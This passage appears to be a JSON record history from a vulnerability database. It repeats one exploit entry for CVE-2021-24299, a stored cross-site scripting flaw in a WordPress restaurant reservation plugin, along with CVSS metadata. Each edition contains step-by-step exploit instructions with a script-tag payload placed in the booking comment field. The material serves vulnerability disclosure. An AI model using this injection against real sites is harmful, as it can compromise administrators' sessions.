"NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-12T11:05:56", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-10T22:51:11", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-10T22:51:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-12] #"}, "lastseen": "2021-10-12T11:05:56", "differentElements": ["sourceData"], "edition": 41}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "902a98d2a67be2525189a663da71c999", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-12T23:14:31", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-12T23:14:31", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-12T23:14:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-13] #"}, "lastseen": "2021-10-12T23:14:31", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "1e593d4af3206dcc1df5122cd2a14789", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-14T20:55:22", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-14T20:55:22", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-14T20:55:22", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-14] #"}, "lastseen": "2021-10-14T20:55:22", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "754e0f27b631531b618a2a836b3669c4", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-14T22:58:53", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-14T22:58:53", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-14T22:58:53", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-15] #"}, "lastseen": "2021-10-14T22:58:53", "differentElements": ["sourceData"], "edition": 44}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "54264667a8ce89676902d59b34199208", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-15T22:49:31", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-14T22:58:53", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-14T22:58:53", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-16] #"}, "lastseen": "2021-10-15T22:49:31", "differentElements": ["sourceData"], "edition": 45}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "19901eeab0394945601ab64b181f0a48", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-16T22:46:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-14T22:58:53", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-14T22:58:53", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-17] #"}, "lastseen": "2021-10-16T22:46:52", "differentElements": ["sourceData"], "edition": 46}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "7f5d14207cf3cb567b4fdefa3265dbed", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-18T12:45:21", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-14T22:58:53", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-14T22:58:53", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-18] #"}, "lastseen": "2021-10-18T12:45:21", "differentElements": ["sourceData"], "edition": 47}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "82f8bca1f5fc8c3ab88ea0e828ff3e40", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-19T04:48:36", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-14T22:58:53", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-14T22:58:53", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-19] #"}, "lastseen": "2021-10-19T04:48:36", "differentElements": ["sourceData"], "edition": 48}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "8ed638cc497dede20b1776dda9f3b818", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-21T20:36:05", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-21T20:36:05", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-21T20:36:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the 